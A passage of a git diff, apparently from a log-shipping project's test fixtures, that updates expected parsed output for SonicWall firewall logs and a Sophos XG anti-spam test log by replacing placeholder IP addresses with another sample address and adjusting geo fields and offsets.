         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.offset": 0,
-        "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -18,16 +18,9 @@
         "rsa.internal.event_desc": "Connection Opened",
         "rsa.internal.messageid": "98",
         "rsa.internal.msg": "Connection Opened",
-        "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "rsa.time.event_time": "2007-01-03T16:48:06.000Z",
         "service.type": "sonicwall",
-        "source.as.number": 3215,
-        "source.as.organization.name": "Orange",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
         "source.ip": "2.2.2.2",
         "source.port": 36701,
         "tags": [
@@ -41,13 +34,13 @@
         "event.code": "30",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN",
+        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 203,
+        "log.offset": 215,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -67,11 +60,11 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "event.original": "Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 414,
-        "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "log.offset": 438,
+        "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -81,16 +74,9 @@
         "rsa.internal.event_desc": "Connection Opened",
         "rsa.internal.messageid": "98",
         "rsa.internal.msg": "Connection Opened",
-        "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "rsa.time.event_time": "2007-01-03T16:48:07.000Z",
         "service.type": "sonicwall",
-        "source.as.number": 3215,
-        "source.as.organization.name": "Orange",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
         "source.ip": "2.2.2.2",
         "source.port": 36702,
         "tags": [
@@ -104,13 +90,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242",
+        "event.original": "Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 617,
+        "log.offset": 653,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -132,13 +118,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"",
+        "event.original": "Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 843,
+        "log.offset": 885,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -160,13 +146,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"",
+        "event.original": "Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 1092,
+        "log.offset": 1140,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -188,13 +174,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152",
+        "event.original": "Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 1345,
+        "log.offset": 1399,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -215,11 +201,11 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 1560,
-        "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "log.offset": 1626,
+        "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -229,16 +215,9 @@
         "rsa.internal.event_desc": "Connection Opened",
         "rsa.internal.messageid": "98",
         "rsa.internal.msg": "Connection Opened",
-        "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "rsa.time.event_time": "2007-01-03T16:48:10.000Z",
         "service.type": "sonicwall",
-        "source.as.number": 3215,
-        "source.as.organization.name": "Orange",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
         "source.ip": "2.2.2.2",
         "source.port": 36703,
         "tags": [
@@ -252,13 +231,13 @@
         "event.code": "30",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN",
+        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 1763,
+        "log.offset": 1841,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -278,11 +257,11 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "event.original": "Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 1974,
-        "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "log.offset": 2064,
+        "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -292,16 +271,9 @@
         "rsa.internal.event_desc": "Connection Opened",
         "rsa.internal.messageid": "98",
         "rsa.internal.msg": "Connection Opened",
-        "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+        "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
         "rsa.time.event_time": "2007-01-03T16:48:11.000Z",
         "service.type": "sonicwall",
-        "source.as.number": 3215,
-        "source.as.organization.name": "Orange",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
         "source.ip": "2.2.2.2",
         "source.port": 36704,
         "tags": [
@@ -314,13 +286,13 @@
         "event.code": "38",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN  type=3 code=3",
+        "event.original": "Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=89.160.20.156 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=89.160.20.156:6822:WAN  type=3 code=3",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 2177,
+        "log.offset": 2279,
         "observer.ingress.interface.name": "WAN",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
@@ -333,11 +305,6 @@
         "rsa.network.sinterface": "WAN",
         "rsa.time.event_time": "2007-01-03T16:48:14.000Z",
         "service.type": "sonicwall",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "NZ",
-        "source.geo.country_name": "New Zealand",
-        "source.geo.location.lat": -41.0,
-        "source.geo.location.lon": 174.0,
         "source.ip": "219.89.19.223",
         "source.port": 1026,
         "tags": [
@@ -351,13 +318,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0",
+        "event.original": "Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=89.160.20.156:0:WAN proto=udp/0",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 2382,
+        "log.offset": 2496,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -378,10 +345,10 @@
         "event.code": "346",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=1.1.1.1:500",
+        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=89.160.20.156:500",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 2582,
+        "log.offset": 2708,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -399,16 +366,16 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500",
+        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 2780,
+        "log.offset": 2918,
         "observer.ingress.interface.name": "WAN dst=2.2.2.2:500:WAN proto=udp/500",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
         "related.ip": [
-            "1.1.1.1"
+            "89.160.20.156"
         ],
         "rsa.internal.event_desc": "Connection Opened",
         "rsa.internal.messageid": "98",
@@ -416,14 +383,17 @@
         "rsa.network.sinterface": "WAN dst=2.2.2.2:500:WAN proto=udp/500",
         "rsa.time.event_time": "2007-01-03T16:48:15.000Z",
         "service.type": "sonicwall",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.1",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 500,
         "tags": [
             "forwarded",
@@ -435,10 +405,10 @@
         "event.code": "483",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500",
+        "event.original": "Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=89.160.20.156:500",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 2977,
+        "log.offset": 3127,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -455,10 +425,10 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
+        "event.original": "Jan  3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 3165,
+        "log.offset": 3327,
         "observer.ingress.interface.name": "WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
@@ -484,10 +454,10 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445",
+        "event.original": "Jan  3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 3375,
+        "log.offset": 3543,
         "observer.ingress.interface.name": "LAN dst=192.168.1.100:445:WAN proto=tcp/445",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
@@ -514,13 +484,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957",
+        "event.original": "Jan  3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 sent=1557 rcvd=957",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 3584,
+        "log.offset": 3758,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -542,13 +512,13 @@
         "event.code": "537",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"",
+        "event.original": "Jan  3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"",
         "fileset.name": "firewall",
         "input.type": "log",
         "log.flags": [
             "dissect_parsing_error"
         ],
-        "log.offset": 3806,
+        "log.offset": 3992,
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
         "observer.vendor": "Sonicwall",
@@ -569,10 +539,10 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582",
+        "event.original": "Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 4049,
+        "log.offset": 4241,
         "observer.ingress.interface.name": "WAN dst=192.168.5.10:3582:LAN proto=udp/3582",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
@@ -598,10 +568,10 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
         "event.module": "sonicwall",
-        "event.original": "Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
+        "event.original": "Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
         "fileset.name": "firewall",
         "input.type": "log",
-        "log.offset": 4260,
+        "log.offset": 4458,
         "observer.ingress.interface.name": "WAN dst=192.168.5.10:53:LAN proto=tcp/dns",
         "observer.product": "Firewalls",
         "observer.type": "Firewall",
diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log
index 71fc60338005..5480251c5041 100644
--- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log
+++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log
@@ -1,7 +1,7 @@
 <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other"
-<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="<MzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big" mailsize=13371 spamaction="Accept" reason="Mail is Clean." src_domainname="constant-big.email" dst_domainname="" src_ip=92.38.133.63 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other"
-<30>device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="<oE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud" mailsize=2025 spamaction="Reject" reason="Mail detected as SPAM." src_domainname="17buddies.net" dst_domainname="" src_ip=187.95.82.175 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam"
-<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL"
+<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="<MzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big" mailsize=13371 spamaction="Accept" reason="Mail is Clean." src_domainname="constant-big.email" dst_domainname="" src_ip=89.160.20.156 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other"
